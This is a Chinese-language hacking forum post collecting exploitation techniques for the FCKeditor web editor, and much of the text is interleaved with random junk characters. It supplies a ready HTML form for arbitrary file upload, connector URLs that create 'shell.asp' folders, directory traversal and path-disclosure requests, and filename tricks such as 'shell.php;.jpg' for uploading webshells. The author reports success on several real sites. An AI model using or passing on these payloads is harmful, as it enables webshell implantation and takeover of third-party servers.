Fckeditor漏洞利用总结 6 {+ ~7 G1 I* Y; Z
查看编辑器版本
) U& E* K0 b6 Z8 h7 `FCKeditor/_whatsnew.html
* b9 P4 H* H0 }* g$ f1 g% v9 e9 s! K—————————————————————————————————————————————————————————————
2 j* H: z0 Z% O3 _; j/ b2 @0 ]0 S
( h! o6 w, ^+ q G- ]' a: t2. Version 2.2 版本' A: }( p! h9 j; h6 W2 W3 N3 r2 u
Apache+linux 环境下在上传文件后面加个.突破!测试通过。/ b/ H5 [' T3 F' Y, m$ h; c
—————————————————————————————————————————————————————————————
9 e; U0 G3 a% D; U( s1 a$ h- }8 k
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
: u' h' b- K0 E# k" u( y<form id="frmUpload" enctype="multipart/form-data"
5 x! J# t: h' \+ s I) Naction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
* M8 m+ ?9 K6 a( u' [. F7 D<input type="file" name="NewFile" size="50"><br>
; I" k% L4 q2 \* s2 p<input id="btnUpload" type="submit" value="Upload"> m$ R* C) y4 B6 d, p
</form>
& X6 b4 D6 E4 A% M" r—————————————————————————————————————————————————————————————# v' o+ [, K3 R6 {! f
) S v/ { c- D# U* h% n8 @1 H$ V3 Z4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
* v" Z" S' O! N- O0 y" ]2 ^) S8 p 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。- W. W+ h# W) O8 v5 f
4.1:提交shell.php+空格绕过$ a1 _ h* ~* W2 q# h
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。1 \: O% f6 x- a' S
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
# M) C; S+ {0 x$ Y- _, i' H—————————————————————————————————————————————————————————————
! N+ }6 K. R& ?2 [& ^
% r: d0 M! L/ n; j5. 突破建立文件夹; ?3 o! x) c1 \# Z
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
' v2 m( m1 z2 L/ aFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp& M7 _ e6 m% C! o: \- B x
—————————————————————————————————————————————————————————————" {1 d1 c! Z9 p9 ^
3 u: }& |( u- w8 j3 E6. FCKeditor 中test 文件的上传地址! S9 ~) I; o' Q7 @2 h- r
FCKeditor/editor/filemanager/browser/default/connectors/test.html8 @+ U/ J$ h% h; D7 h7 n" R
FCKeditor/editor/filemanager/upload/test.html
) T- ]. L* E* l4 O/ f/ j6 tFCKeditor/editor/filemanager/connectors/test.html- h- g' K) n( x6 c- t, D' z3 `8 ^
FCKeditor/editor/filemanager/connectors/uploadtest.html( e) n6 y0 u4 I) d
—————————————————————————————————————————————————————————————
0 d4 X1 s, |$ P% K9 V
" [/ k! i$ {1 g4 F3 y. }8 |7.常用上传地址: j. ^( e- @5 w o5 B8 T! ?5 x% S
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/, I# d4 Z' K, F9 y9 d `
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
7 x/ ~5 |0 h$ a* Q1 R* zFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
3 V" U7 }6 o7 MJSP 版:
) j" D3 ^" z2 i$ x' s3 i, C. {FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
8 h. l9 ]& t; z: L, C# A注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
$ q' j" @: |/ W2 Z9 {件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
, L4 p- T/ q6 h/ P—————————————————————————————————————————————————————————————8 x6 z% d" V% N
, o/ D, u8 A* Y+ v3 f1 [& P
8.其他上传地址; W3 K' K' g P, C O: ~1 M' j
FCKeditor/_samples/default.html
( B5 d1 x( {- cFCKeditor/_samples/asp/sample01.asp
5 k1 e+ m7 G$ X: bFCKeditor/_samples/asp/sample02.asp
1 s* |" o% T8 a3 ^" v7 B: N% nFCKeditor/_samples/asp/sample03.asp
' q* Y" h' R/ P3 |. cFCKeditor/_samples/asp/sample04.asp
3 e- s) q# {. K& {" V+ ~: y$ J一般很多站点都已删除_samples 目录,可以试试。; ^' `+ x1 a, A- X( @6 q+ |
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。; I& j7 D4 F! D( f, ~0 ^
—————————————————————————————————————————————————————————————
$ X; P7 H* {: |' y }3 h, b; @ ?
9.列目录漏洞也可助找上传地址+ x# o, o& e! J, n; f
Version 2.4.1 测试通过, C2 N, K* J0 e7 G) `0 j
修改CurrentFolder 参数使用 ../../来进入不同的目录
& t, t: I( \) b' Y5 c: `+ g/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
0 @( p% n7 f# O0 l0 n* I$ X' O+ ?根据返回的XML 信息可以查看网站所有的目录。1 s8 ]* W5 g7 c2 c
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F P, Y: _2 e5 r, V( ~0 n, b
也可以直接浏览盘符:
- z- ?3 {1 N2 w$ JJSP 版本:( d' Q( d! f) X& U. C
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
' |( K6 Y H0 K& d—————————————————————————————————————————————————————————————6 F* d$ |6 k3 ]4 \* {2 A8 F
5 Q1 v" T! }0 Y0 u; H0 N10.爆路径漏洞
1 E- g& K0 ?4 l/ F" Z3 |! j! _ VFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
" L( o2 ?6 X' B/ k—————————————————————————————————————————————————————————————, q$ B( C. h1 w, K4 G/ l" K+ [
5 i% c* w: \. Y$ Q
11. FCKeditor 被动限制策略所导致的过滤不严问题
3 p3 o( w0 D. p 影响版本: FCKeditor x.x <= FCKeditor v2.4.3* ?7 S& S3 }+ ^: X% U& o( A. P
脆弱描述:
, A& \* d: H0 `FCKeditor v2.4.3 中File 类别默认拒绝上传类型:* O H* w2 h9 r; }1 l- M5 I0 v3 \, w
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm# A* C3 L% \ a4 r5 k. S
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!) y/ k( E6 V1 L; @# R5 D
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
/ d' O3 i4 Y+ u4 T 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
5 o, T% c, o- ^ {—————————————————————————————————————————————————————————————
! K# h$ }, _$ U8 F$ {, R/ l7 i
12.最古老的漏洞,Type文件没有限制!/ [0 b. y& [9 E* E3 }3 k4 Z
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! 2 f% }" P# O( y) t5 z5 V
—————————————————————————————————————————————————————————————! M* _5 ~' `- M; s5 t% ~: g$ ?2 u- x
$ e4 d1 h# h M+ A2 t& a
===============================================================================================================================================0 a% M4 P7 `1 v0 ^0 g! X- z* `
E& P/ @/ h7 A6 w8 m: vFCK编辑器jsp版本漏洞:# e# b n1 n/ F( z1 c8 {
' N! Z4 ]- B# Q8 u$ \
% }3 ]" c, ]( E+ }6 W9 chttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
5 t) B, i3 `: X% M- q( L( o) C ?; |8 c) s. u5 Z
上传马所在目录
, ~/ A$ i' N; dFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ d) T& e O" J- }0 X$ ]
上传shell的地址:) M E- ~, R9 H8 [0 e( J. P x
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector) P& _) n& }4 B% i3 E& D# O. A
跟版本有关系.并不是百分百成功. 测试成功几个站.
4 z! J" C: w: M$ E不能通杀.很遗憾.+ m3 l2 g# q% ]5 }( } g; ]) C2 K
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector; a0 E/ m+ D7 d: G, }- `+ P
如果以上地址不行可以试试
, b; E4 n% ~" R) ~& LFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector/ Y4 |2 ^" b, R$ ^, A b( P
FCKeditor/_samples/- `# L A/ B+ T9 _
FCKeditor/_samples/default.html
8 f( B" ~1 K' Q' {& A6 QFCKeditor/editor/fckeditor.htm
' ^8 y J A5 L6 q& d: s* v, b3 XFCKeditor/editor/fckdialog.html+ } p7 p! r7 e( Y
2 l9 _+ @7 M6 x
8 ~0 o" J1 B% \1 V% W. }8 E" a- a
% n6 T2 I5 r0 C5 A% E解析漏洞+未重命名文件时上传漏洞 1.asp;jpg) V+ q' J" K) A! X. e5 d& g# D
|